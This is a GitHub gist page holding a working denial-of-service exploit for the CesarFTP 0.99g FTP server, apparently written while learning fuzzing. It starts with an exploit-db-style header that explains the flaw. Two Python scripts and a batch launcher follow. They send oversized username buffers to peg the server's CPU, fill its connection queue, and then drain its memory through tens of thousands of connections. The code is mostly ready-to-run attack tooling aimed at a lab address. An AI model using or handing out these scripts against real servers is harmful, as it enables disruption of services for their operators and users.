Skip to content

Instantly share code, notes, and snippets.

@decidedlygray
Created November 12, 2015 02:40
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save decidedlygray/1421bf1a2f7beb6bccff to your computer and use it in GitHub Desktop.
Save decidedlygray/1421bf1a2f7beb6bccff to your computer and use it in GitHub Desktop.
# Exploit Title: CesarFTP 0.99g Remote Resource Exhaustion Vulnerability v4260
# Date: 10/16/2015
# Exploit Author: @decidedlygray (independently discovered while learning Sulley fuzzing framework)
# Vendor Homepage: ACLogic.com [NO LONGER EXISTS]
# Software Link: http://download.cnet.com/CesarFTP/3000-2160_4-13481.html
# Version: 0.99g
# Tested on: Windows XP, Windows 7
#
# Exploit for the issue already discovered in 2004:
# - CesarFTP Server Long Command Denial of Service Exploit - https://www.exploit-db.com/exploits/428/
# - ACLogic CesarFTP 0.99 - Remote Resource Exhaustion Vulnerability - https://www.exploit-db.com/exploits/23700/
#
# Details:
#
# This vulnerability is a remote resource exhaustion / DOS vulnerability.
#
# By sending an overly long command it is possible to cause the CesarFTP.exe
# subprocess Server.exe to enter an infinite loop and peg 99% CPU usage.
#
# ftp_user = 'USER '+'/\\'*32764 ##MAX SIZE ALLOWED
# ftp_user = 'USER '+'/\\'*2045 ##MIN SIZE TO CAUSE CPU USAGE ISSUE
# ftp_user = 'A'*4095 ##MIN SIZE TO CAUSE RESOURCE ISSUE
#
# It appears opening up 3 of these types of connections fills up the connection
# queue which is never released under these conditions until the client chooses
# to close the connection. While additional TCP connections are opened to the
# server, the FTP Server queue is filled so they just sit there unable to auth with
# the FTP server.
#
# All additional connection attempts seem to open a socket that
# isn't closed on the server side even if the client disconnects. These additional
# connections (after initial 3 DOS/locking connections made) appear in the Cesar
# running log of connections and aren't cleared until the 3 DOS connections are closed.
#
# Each additional connection uses additional memory in the Server.exe
# process which isn't freed until the 3 DOS connections are closed. Server.exe seems
# to allocated an additional 4K of process memory per additional connection. Some
# additional memory is also allocated in the CesarFTP.exe process.
#
# Post: Even if client sends long USER and disconnects the Server.exe stays stuck in
# its 99% use loop. On WinXP - even if you close CesarFTP.exe the server continues
# to run and use 99% CPU. It must be manually killed through task manager.
#!/usr/bin/python
import socket
def do_connect():
# ftp_user = 'USER '+'/\\'*2045 ##MIN SIZE TO CAUSE RESOURCE ISSUE
# ftp_user = 'USER '+'/\\'*32764 ##MAX SIZE ALLOWED BEFORE INPUT IS REJECTED
# print 'USER is going to be:\n'+ftp_user
#USER command is irrelevant
ftp_user = 'A'*4095 ##MIN SIZE TO CAUSE RESOURCE ISSUE
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
print 'Connecting'
s.connect(('192.168.56.104',21))
data = s.recv(1024)
print data
print '\nSending long username...'
s.send(ftp_user+'\r\n')
data = s.recv(1024)
print data
# Execution never actually makes it here...
s.send('PASS superfuzzy\r\n')
data = s.recv(1024)
print data
s.close()
print 'fin.'
except:
print 'Oops! Something broke :('
s.close()
if __name__ == '__main__':
do_connect()
cd %~dp0
start python cesar_remoteDOS.py
start python cesar_remoteDOS.py
start python cesar_remoteDOS.py
REM this one (and all subsequent) will hang beceause the queue is full
start python cesar_remoteDOS.py
pause
#!/usr/bin/python
"""
CesarFTP 0.99g Remote Resource Exhaustion Vulnerability
@decidedlygray 10/16/2015
CesarFTP memory exhaustion script
Each new connection attempt uses an additional 4K of memory
512000K = 512MB
128000 attempts to fill 512MB of memory?
Run this after cesar_remoteDOS.run.bat has filled up the conn queue. This
script will drain the memory of the target (CPU already pegged).
"""
import socket
import select
import time
def do_connect():
total_connections=128000/4 #manually add 4 workers for faster takedown
for i in range(1,total_connections):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setblocking(0)
s.settimeout(0.25)
try:
print '['+str(i)+'/'+str(total_connections)+'] Connecting'
s.connect(('192.168.56.104',21))
# timeout_in_seconds = 1
# ready = select.select([s], [], [], timeout_in_seconds)
# if ready[0]:
# data = s.recv(4096)
data = s.recv(1024)
print data
print '['+str(i)+'] Sending large data buffer..'
# ftp_user = 'USER '+'/\\'**32764 ##MAX SIZE ALLOWED
# note: doesnt need user command, any data will do
ftp_user = 'A'*4095 ##MIN SIZE TO CAUSE RESOURCE ISSUE
s.send(ftp_user+'\r\n')
data = s.recv(1024) #times out here
print data
#Execution never makes it here
print '['+str(i)+'] Sending password...'
s.send('PASS test\r\n')
data = s.recv(1024)
print data
s.close()
except:
print '['+str(i)+'/'+str(total_connections)+'] Could not connect to FTP!'
s.close()
if __name__ == '__main__':
do_connect()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment